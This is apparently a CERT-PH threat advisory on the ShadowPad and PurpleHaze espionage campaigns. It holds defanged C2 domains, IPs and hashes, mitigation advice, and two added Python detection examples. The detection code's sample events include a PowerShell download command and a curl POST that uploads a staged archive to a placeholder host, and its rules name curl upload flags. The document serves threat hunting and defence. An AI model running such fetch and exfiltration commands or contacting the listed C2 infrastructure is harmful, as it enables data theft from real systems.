SentinelLabs, the research arm of SentinelOne, has observed and defended against a malicious campaign targeting public sector organizations and global industries, including SentinelOne itself.

Based on the official blog post, 6 activities have been observed and tracked to the PurpleHaze and ShadowPad activity clusters.

ShadowPad Cluster

SentinelLabs has uncovered a sophisticated campaign targeting a South Asian government and an IT services and logistics company with ties to SentinelOne. The attack was attributed to APT41, which leveraged an obfuscated ShadowPad variant known as ScatterBrain. Several samples from this campaign were also reported by security vendors including Trend Micro, Orange Cyberdefense, and Check Point.

In one observed activity, a sample named “AppSov.exe” was used to download a malicious file called “x.dat” via a PowerShell command. Once executed, the file collects sensitive user data, copies the files to a temporary folder, compresses them using 7-Zip with password protection, and exfiltrates the archive via a cURL POST request.
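The staging-and-exfiltration sequence described above (PowerShell download, password-protected 7-Zip archive, cURL POST) is more useful as a detection when the three steps are correlated than when any one of them is alerted on alone, since password-protected archives and curl uploads are both common in legitimate administration. The following is an added example, not code from CERT-PH or SentinelLabs: a small process-chain rule over constructed process-creation events. The field names on the event (host, user, image, cmdline), the 30-minute window, and every hostname, path and URL in the sample events are assumptions made for the demo.

```python
"""Added example: correlate PowerShell download -> 7-Zip with password -> curl
POST on the same host and user within a time window. Events, field names and
the window size are constructed for this demo, not taken from the advisory."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

WINDOW_SECONDS = 30 * 60  # assumption: all three stages must occur within 30 minutes


@dataclass
class ProcEvent:
    ts: int        # seconds since epoch (constructed)
    host: str
    user: str
    image: str     # executable file name as reported by the EDR/Sysmon source
    cmdline: str


def is_download(e: ProcEvent) -> bool:
    """Stage 1: PowerShell fetching content from the network."""
    cl = e.cmdline.lower()
    return e.image.lower() == "powershell.exe" and (
        "downloadfile" in cl or "downloadstring" in cl or "invoke-webrequest" in cl)


def is_password_archive(e: ProcEvent) -> bool:
    """Stage 2: 7-Zip adding files ('a') to an archive with a password ('-p')."""
    cl = e.cmdline.lower()
    return e.image.lower() in ("7z.exe", "7za.exe", "7zr.exe") and " a " in f" {cl} " and " -p" in cl


def is_curl_upload(e: ProcEvent) -> bool:
    """Stage 3: curl sending data rather than fetching it. Checked case-sensitively
    because curl's -F (form upload) and -f (fail silently) differ only by case."""
    cl = e.cmdline
    return e.image.lower() == "curl.exe" and any(
        tok in cl for tok in (" -X POST", " -F ", " -d ", " --data", " -T ", " --upload-file"))


STAGES = (
    ("powershell_download", is_download),
    ("7zip_password_archive", is_password_archive),
    ("curl_post", is_curl_upload),
)


def detect_chain(events: List[ProcEvent]) -> List[Dict]:
    """Return one alert per (host, user) where all stages occur in order within
    WINDOW_SECONDS of the first stage. Out-of-order or lone stages do not alert."""
    state: Dict[Tuple[str, str], Tuple[int, int, List[Tuple[str, int]]]] = {}
    alerts: List[Dict] = []
    for e in sorted(events, key=lambda ev: ev.ts):
        key = (e.host, e.user)
        idx, first_ts, seen = state.get(key, (0, None, []))
        if first_ts is not None and e.ts - first_ts > WINDOW_SECONDS:
            idx, first_ts, seen = 0, None, []        # window expired: start over
        name, pred = STAGES[idx]
        if pred(e):
            seen = seen + [(name, e.ts)]
            first_ts = e.ts if first_ts is None else first_ts
            idx += 1
            if idx == len(STAGES):
                alerts.append({"host": e.host, "user": e.user, "stages": seen})
                idx, first_ts, seen = 0, None, []
        state[key] = (idx, first_ts, seen)
    return alerts


# Constructed sample events; hostnames, users, paths and URLs are invented.
SAMPLE_EVENTS = [
    ProcEvent(1000, "WS01", "alice", "powershell.exe",
              r"powershell.exe -c Invoke-WebRequest -Uri https://dl.example.invalid/x.dat -OutFile C:\Users\Public\x.dat"),
    ProcEvent(1300, "WS01", "alice", "7z.exe",
              r"7z.exe a -pREDACTED C:\Users\alice\AppData\Local\Temp\out.7z C:\Users\alice\Documents"),
    ProcEvent(1600, "WS01", "alice", "curl.exe",
              r'curl.exe -X POST -F "data=@C:\Users\alice\AppData\Local\Temp\out.7z" https://upload.example.invalid/collect'),
    # Benign: a backup job password-protects an archive but never downloads or uploads.
    ProcEvent(2000, "WS02", "bob", "7z.exe", r"7z.exe a -pBackupKey D:\backup\docs.7z D:\docs"),
    ProcEvent(2100, "WS02", "bob", "curl.exe", r"curl.exe -o report.csv https://intranet.example.invalid/report.csv"),
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on host and user rather than on process ancestry, because the three binaries in the described chain need not share a parent; a stricter variant could additionally require the 7-Zip output path to appear in the curl command line.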

PurpleHaze Cluster

The PurpleHaze activity cluster leveraged the GOREshell backdoor and an Operational Relay Box (ORB) network to conduct cyberespionage, targeting a South Asian government entity and SentinelOne. Meanwhile, the attack on a European media organization was attributed to UNC5174, which exploited CVE-2024-8963 and CVE-2024-8190 to establish an initial foothold.

FILES (SHA-1)
  106248206f1c995a76058999ccd6a6d0f420461e  Webshell
  411180c89953ab5e0c59bd4b835eef740b550823  GOREshell (snapd)
  4896cfff334f846079174d3ea2d541eec72690a0  Nimbo-C2 agent (PfSvc.exe)
  5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a  ShadowPad
  7dabf87617d646a9ec3e135b5f0e5edae50cd3b9  GOREshell (update-notifier)
  a31642046471ec138bb66271e365a01569ff8d7f  GOREshell
  a88f34c0b3a6df683bb89058f8e7a7d534698069  ShadowPad
  aa6a9c25aff0e773d4189480171afcf7d0f69ad9  ShadowPad
  c43b0006b3f7cd88d31aded8579830168a44ba79  ShadowPad
  cb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b  GOREshell (glib-2.0.dll)
  cbe82e23f8920512b1cf56f3b5b0bca61ec137b9  Legitimate VMWare executable (VGAuthService.exe)
  ebe6068e2161fe359a63007f9febea00399d7ef3  GOREshell
  f52e18b7c8417c7573125c0047adb32d8d813529  ShadowPad (AppSov.exe)

DOMAINS
  cloud.trendav[.]co             Suspected PurpleHaze infrastructure
  downloads.trendav[.]vip        GOREshell C2 server
  dscriy.chtq[.]net              ShadowPad C2 server
  epp.navy[.]ddns[.]info         GOREshell C2 server
  mail.ccna[.]organiccrap[.]com  GOREshell C2 server
  mail.secmailbox[.]us           Suspected PurpleHaze infrastructure
  network.oossafe[.]com          Suspected ShadowPad C2 server
  news.imaginerjp[.]com          ShadowPad C2 server
  notes.oossafe[.]com            Suspected ShadowPad C2 server
  secmailbox[.]us                Suspected PurpleHaze infrastructure
  sentinelxdr[.]us               Suspected PurpleHaze infrastructure
  tatacom.duckdns[.]org          C2 server
  trendav[.]vip                  Suspected PurpleHaze infrastructure
  updata.dsqurey[.]com           ShadowPad C2 server

IP ADDRESSES
  103.248.61[.]136   Malware hosting location
  107.173.111[.]26   GOREshell C2 server
  128.199.124[.]136  C2 server
  142.93.212[.]42    Suspected PurpleHaze infrastructure
  142.93.214[.]219   GOREshell C2 server
  143.244.137[.]54   Suspected PurpleHaze infrastructure
  45.13.199[.]209    Exfiltration IP address
  65.38.120[.]110    ShadowPad C2 server

URLs
  https[://]45.13.199[.]209/rss/rss.php  Exfiltration URL
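The indicators above are published in defanged form ("[.]", "[://]") so they cannot be clicked by accident, which also means they will not match raw log text until they are refanged. The following is an added example, not code from CERT-PH or SentinelLabs, showing how to refang a subset of the listed indicators and match them against constructed log lines; the hosts and IPs are anchored so that a listed domain does not fire on an unrelated longer hostname. The log line format and the timestamps are assumptions made for the demo.

```python
"""Added example: refang the advisory's defanged IoCs and hunt for them in log
text. The sample log lines are constructed for this demo."""
import re
from typing import Dict, List, Tuple

# Indicators copied from the advisory above, still defanged (subset for brevity).
DEFANGED_HASHES = {
    "106248206f1c995a76058999ccd6a6d0f420461e": "Webshell",
    "411180c89953ab5e0c59bd4b835eef740b550823": "GOREshell (snapd)",
    "f52e18b7c8417c7573125c0047adb32d8d813529": "ShadowPad (AppSov.exe)",
}
DEFANGED_DOMAINS = {
    "downloads.trendav[.]vip": "GOREshell C2 server",
    "dscriy.chtq[.]net": "ShadowPad C2 server",
    "sentinelxdr[.]us": "Suspected PurpleHaze infrastructure",
    "trendav[.]vip": "Suspected PurpleHaze infrastructure",
}
DEFANGED_IPS = {
    "45.13.199[.]209": "Exfiltration IP address",
    "65.38.120[.]110": "ShadowPad C2 server",
}


def refang(indicator: str) -> str:
    """Turn '[.]', '[://]' and 'hxxp' back into their live forms so the
    indicator compares equal to what actually appears in logs."""
    return (indicator.replace("[.]", ".")
                     .replace("[://]", "://")
                     .replace("hxxp", "http"))


def build_matchers():
    """Compile one regex for hosts/IPs and one for SHA-1 strings. Host matches are
    anchored on non-hostname characters, so 'trendav.vip' does not fire inside
    'downloads.trendav.vip' or 'nottrendav.vip'; the longer listed name still does."""
    hashes = {h.lower(): label for h, label in DEFANGED_HASHES.items()}
    hosts: Dict[str, str] = {refang(d).lower(): l for d, l in DEFANGED_DOMAINS.items()}
    hosts.update({refang(ip): l for ip, l in DEFANGED_IPS.items()})
    host_re = re.compile(
        r"(?<![A-Za-z0-9.-])(" + "|".join(re.escape(h) for h in hosts) + r")(?![A-Za-z0-9.-])",
        re.IGNORECASE)
    sha1_re = re.compile(r"\b[0-9a-fA-F]{40}\b")
    return hashes, hosts, host_re, sha1_re


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator, label) for every IoC hit in the given lines."""
    hashes, hosts, host_re, sha1_re = build_matchers()
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        for m in host_re.finditer(line):
            ind = m.group(1).lower()
            hits.append((n, ind, hosts[ind]))
        for m in sha1_re.finditer(line):
            h = m.group(0).lower()
            if h in hashes:
                hits.append((n, h, hashes[h]))
    return hits


# Constructed sample log lines (timestamps, hosts and paths are invented).
SAMPLE_LOGS = [
    "2025-04-01T10:00:01Z dns query=dscriy.chtq.net rcode=NOERROR",
    "2025-04-01T10:00:05Z proxy dst=45.13.199.209 method=POST uri=/rss/rss.php",
    r"2025-04-01T10:01:00Z edr file=C:\Users\Public\AppSov.exe sha1=F52E18B7C8417C7573125C0047ADB32D8D813529",
    "2025-04-01T10:02:00Z dns query=nottrendav.vip rcode=NXDOMAIN",
    "2025-04-01T10:03:00Z dns query=downloads.trendav.vip rcode=NOERROR",
    "2025-04-01T10:04:00Z proxy dst=145.13.199.209 method=GET uri=/",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

Blocking and hunting on the IP-based indicators should be treated with more care than the hashes: the same address can be reassigned to unrelated tenants on shared hosting, so a hit on an IP is a lead to investigate rather than proof on its own.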

CERT-PH recommends the following actions be taken:

  • Regularly apply necessary updates and patches to mitigate future threats, especially on public-facing assets.
  • Proactively monitor the logs and network traffic of the identified systems and devices for any suspicious or malicious activity.
  • Install anti-virus software and/or a host-based detection tool running with the latest version to protect your data and devices.
  • Indicators of compromise are available in the official report for threat hunting and blocking purposes.
  • Conduct third-party audits of service providers for security compliance to help identify and mitigate potential security risks.
  • For additional information, kindly refer to the official report:
    • https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/